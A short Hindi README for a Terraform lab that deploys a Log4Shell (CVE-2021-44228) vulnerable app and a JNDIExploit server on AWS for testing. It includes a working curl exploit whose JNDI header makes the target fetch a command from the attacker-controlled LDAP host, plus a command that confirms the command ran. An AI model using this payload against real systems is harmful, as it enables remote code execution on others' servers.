
एक कमजोर ऐप को तैनात करने के लिए Terraform और CVE-2021-44228 के साथ काम करने के लिए JDNIExploit
एक Terraform जो कमजोर ऐप और CVE-2021-44228 के साथ काम करने के लिए JNDIExploit को तैनात करता है
यह Terraform AWS Cloud में एक VPC पर दो इंस्टेंस बनाता है।
आपको बस अपनी AWS_ACCESS_KEY_ID और AWS_SECRET_ACCESS_KEY को export करने की आवश्यकता है।
एक इंस्टेंस JNDIExploit है।
दूसरा Vulnerable-App है जो log4j शोषण के लिए है।
कृपया आवेदन करने से पहले terraform में अपनी SSH-Public-Key को बदल दें
terraform init
terraform plan
terraform apply --auto-approve
AWS पर तैनाती के बाद आप इसे curl अनुरोध से शोषित कर सकते हैं, और vulnerable-app कंटेनर पर /tmp में फ़ाइल निर्माण सत्यापित कर सकते हैं।
curl ${vulnerable-app-IP}:8090 -H 'X-Api-Version: ${jndi:ldap://${JNDIExploit-IP}:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
vulnerable app सर्वर पर निम्न कमांड चलाएँ ताकि कमांड निष्पादन सत्यापित हो सके, आपको pwned फ़ाइल देखनी चाहिए।
sudo docker exec -ti vulnerable-app ls /tmp